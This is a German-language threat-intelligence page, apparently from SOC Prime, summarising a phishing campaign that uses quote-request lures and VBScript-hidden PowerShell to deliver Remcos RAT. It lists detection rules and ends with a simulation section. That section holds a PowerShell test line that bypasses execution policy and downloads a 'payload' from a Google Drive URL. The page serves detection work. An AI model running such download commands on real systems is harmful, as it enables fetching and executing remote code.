SOC Prime Bias: High

05 Oct 2026 16:41 UTC

Gefälschte Angebotsanfragen per E-Mail in Malware-Phishing-Angriffen genutzt

Author Photo
SOC Prime Team linkedin icon Folgen
Gefälschte Angebotsanfragen per E-Mail in Malware-Phishing-Angriffen genutzt
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

Bedrohungsakteure verteilen Phishing-E-Mails, die als Projektangebotanfragen getarnt sind, um bösartige Nutzlasten zu liefern. Die Kampagne verwendet VBScript, um PowerShell-Befehle zu verbergen, die letztendlich eine mehrstufige Nutzlast und Remcos RAT abrufen. Die endgültige Malware unterstützt die Ausführung von Remote-Befehlen, Keylogging und Datenexfiltration von kompromittierten Systemen.

Untersuchung

Das AhnLab Security Intelligence Center (ASEC) identifizierte eine Phishing-Kampagne, bei der komprimierte Archive versteckte VBScripts enthalten. Forscher entdeckten eine Verschleierungsmethode, die notepad.exe missbraucht, um den PowerShell-Exekutablen Namen zu rekonstruieren und auf tokenbasierte String-Substitution für PowerShell-Befehle angewiesen ist. Die mehrstufige Nutzlast nutzt auch COM-Objekte, um eine UAC-Umgehung durchzuführen.

Abschwächung

Benutzer sollten die E-Mail-Domain des Absenders überprüfen und vorsichtig sein, wenn sie unerwartete Anhänge oder Links öffnen. Organisationen sollten E-Mail-Filter konfigurieren, um verdächtige Dateierweiterungen wie .vbs, .exe und .js zu blockieren. Nutzer sollten auch vermeiden, sensible Anmeldeinformationen auf inoffiziellen oder verdächtigen URLs einzugeben, die durch unaufgeforderte E-Mails erhalten wurden.

Antwort

Wenn bösartige Aktivitäten festgestellt werden, überprüfen Sie die Legitimität der ursprünglichen E-Mail und untersuchen Sie verdächtige Dateiaktivitäten innerhalb von %APPDATA%. Überprüfen Sie auf unautorisierte PowerShell-Ausführungen und Indikatoren, die mit Remcos RAT verbunden sind. Isolieren Sie kompromittierte Systeme vom Netzwerk, um zusätzliche C2-Kommunikation, laterale Aktivitäten und potenzielle Datenexfiltration zu verhindern.

Angriffsfluss

Wir aktualisieren diesen Teil noch.

Erkennungen

LOLBAS WScript / CScript (über Prozess-Erstellung)

SOC Prime Team
01. Okt. 2026

Mögliche Dateninfiltration / Exfiltration / C2 über Drittdienste / Tools (über dns_query)

SOC Prime Team
01. Okt. 2026

Mögliche Dateninfiltration / Exfiltration / C2 über Drittdienste / Tools (über dns)

SOC Prime Team
01. Okt. 2026

IOCs (HashMd5) zur Erkennung: Malware Phishing/Betrug: Vorsicht vor Phishing-E-Mails, die als Angebotanfragen getarnt sind

SOC Prime KI-Regeln
01. Okt. 2026

IOCs (SourceIP) zur Erkennung: Malware Phishing/Betrug: Vorsicht vor Phishing-E-Mails, die als Angebotanfragen getarnt sind

SOC Prime KI-Regeln
01. Okt. 2026

IOCs (DestinationIP) zur Erkennung: Malware Phishing/Betrug: Vorsicht vor Phishing-E-Mails, die als Angebotanfragen getarnt sind

SOC Prime KI-Regeln
01. Okt. 2026

Erkennen eines PowerShell-Skripts, das eine Verbindung zum C2-Server herstellt [Windows-Netzwerkverbindung]

SOC Prime KI-Regeln
01. Okt. 2026

Bösartige PowerShell-Ausführung über VBScript-Verschleierung [Windows PowerShell]

SOC Prime KI-Regeln
01. Okt. 2026

Simulation der Ausführung

  • Angriffserzählung & Befehle: Ein Angreifer sendet eine Spearphishing-E-Mail mit einem Link zu einem Dokument. Wenn der Benutzer auf den Link klickt, wird ein versteckter PowerShell-Befehl ausgeführt, der ein bösartiges Skript aus einem Google Drive-Repository zieht. Der Angreifer verwendet den Parameter Parameter

  • , um sicherzustellen, dass die Datei direkt heruntergeladen wird, anstatt im Browser angezeigt zu werden. Ziel ist es, eine dateilose Nutzlast im Arbeitsspeicher auszuführen, um sich vor festplattenbasierten Antivirenprogrammen zu verbergen. Der Befehl ist so konstruiert, dass er die spezielle Erkennungsregel auslöst, die auf dieses Download-Muster abzielt.

    Regressionstest-Skript:
  • # Simulation des PowerShell-Downloads einer Datei von Google Drive über spezifische URL-Muster $targetUrl = „https://drive.google.com/uc?export=download&id=1A2B3C4D5E6F7G8H9I0J“ Start-Process powershell.exe -ArgumentList „-NoProfile -ExecutionPolicy Bypass -Command `“Write-Host ‚Downloading payload…‘; $data = Invoke-WebRequest -Uri ‚$targetUrl‘;`““

    Aufräumbefehle: